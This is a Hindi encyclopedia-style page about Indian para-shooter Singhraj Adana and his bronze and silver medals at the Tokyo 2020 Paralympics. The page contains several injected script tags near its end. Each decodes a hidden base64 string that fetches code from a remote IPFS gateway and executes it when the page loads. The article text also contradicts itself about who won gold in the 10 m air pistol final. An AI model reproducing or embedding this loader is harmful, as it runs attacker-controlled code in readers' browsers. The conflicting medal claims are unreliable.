एक्स्प्रेशन त्रुटि: अनपेक्षित उद्गार चिन्ह "१"।

सिंहराज अदाना

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
सिंहराज अदाना

सिंहराज अदाना (अंग्रेज़ी: Singhraj Adana) भारत के पैरा निशानेबाज़ हैं। उन्होंने ग्रीष्मकालीन पैरालम्पिक, 2020 (टोक्यो पैरालम्पिक) में पुरुषों की 10 मीटर एयर पिस्टल निशानेबाज़ी (पी-1) में देश के लिये काँस्य पदक जबकि पी-4 मिक्स्ड 50 मीटर पिस्टल एसएच-1 में रजत पदक जीता है। स्वर्ण पदक भारत के ही मनीष नरवाल ने जीता।

  • निशानेबाज़ी की 10 मीटर एयर पिस्टल के पी-1 इवेंट के फाइनल में सिंहराज अडाना और चीन के लू शीयोलोंग के बीच अंतिम पलों तक कड़ा संघर्ष देखने को मिला लेकिन अंत में सिंहराज ने दबाव के बीच शानदार खेल का प्रदर्शन किया और 216.8 के स्कोर के साथ काँस्य पदक पर निशाना साधा।
  • इससे पहले 10 मीटर एयर पिस्टल पी-1 इवेंट के क्वॉलिफिकेशन राउंड में भारत के पैरा-शूटर मनीष नरवाल ने टॉप पोजिशन हासिल की थी जबकि सिंहराज अदाना ने छठे स्थान पर रहते हुए फाइनल के लिए क्वॉलिफाई किया था। नरवाल हालांकि फाइनल में कुछ खास प्रदर्शन नहीं कर पाए और दूसरे राउंड के बाद ही बाहर हो गए।
  • सिंहराज अदाना ने फाइनल में बेहतर शूटिंग का प्रदर्शन किया हालांकि उन्हें इस मुक़ाबले में चीन के लू शीयोलोंग से कड़ा संघर्ष करना पड़ा।
  • 19वें शॉट में सिंहराज ने 9.1 का स्कोर किया और वो टॉप थ्री की रेस से बाहर हो गए हालांकि इसके बाद उन्होंने अपने 20वें शॉट में एक बार फिर वापसी की और 9.6 अंकों के साथ एक बार फिर से ब्रॉन्ज मेडल पोजिशन हासिल कर ली। लू शीयोलोंग अपनी इस शॉट में 8.6 अंक ही जुटा सके।
  • इसके बाद अपने अंतिम दो शॉट में सिंहराज ने 10-10 अंकों के स्कोर के साथ काँस्य पदक पक्का कर लिया। चीन के चाओ यांग ने 237.9 अंकों के नए पैरालिंपिक रिकॉर्ड के साथ गोल्ड, जबकि चीन के ही जिंग हुआंग ने 237.5 अंकों के स्कोर के साथ सिल्वर मेडल पर कब्जा जमाया।
  • पुरुषों की पी-4 मिक्स्ड 50 मीटर पिस्टल एसएच-1 में मनीष नरवाल ने पैरालम्पिक का रिकॉर्ड बनाते हुए 218.2 स्कोर किया और स्वर्ण पर निशाना साधा। वहीं पी-1 10 मीटर एयर पिस्टल स्पर्धा में कांस्य जीतने वाले सिंहराज अदाना ने 216.7 अंक बनाकर रजत पदक अपने नाम किया।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>